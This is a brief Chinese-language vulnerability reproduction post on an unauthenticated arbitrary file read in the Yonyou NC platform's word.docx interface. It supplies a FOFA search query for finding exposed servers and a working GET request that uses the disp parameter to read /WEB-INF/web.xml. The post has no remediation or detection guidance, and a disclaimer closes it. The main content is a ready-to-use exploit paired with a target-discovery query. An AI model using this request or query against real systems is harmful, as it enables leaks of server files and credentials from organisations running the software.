【漏洞复现】用友NC word.docx 任意文件读取漏洞

0x01 产品简介

用友NC是用友网络科技股份有限公司开发的一款大型企业数字化平台。它主要用于企业的财务核算、成本管理、资金管理、固定资产管理、应收应付管理等方面的工作，致力于帮助企业建立科学的财务管理体系，提高财务核算的准确性和效率。

0x02 漏洞概述

用友NC word.docx 接口存在任意文件读取漏洞，未授权的攻击者可以通过该漏洞进行任意文件读取，造成服务器敏感信息泄露。

0x03 测绘语句

fofa: app="用友-UFIDA-NC"

0x04 漏洞复现

GET /portal/docctr/open/word.docx?disp=/WEB-INF/web.xml HTTP/1.1

0x05 影响范围

用友NC

0x06 免责声明

本文所涉及的任何技术、信息或工具，仅供学习和参考之用。

请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响，均由使用者个人承担责任，与本文作者无关。

作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明，并承诺遵守相关法律法规和道德规范。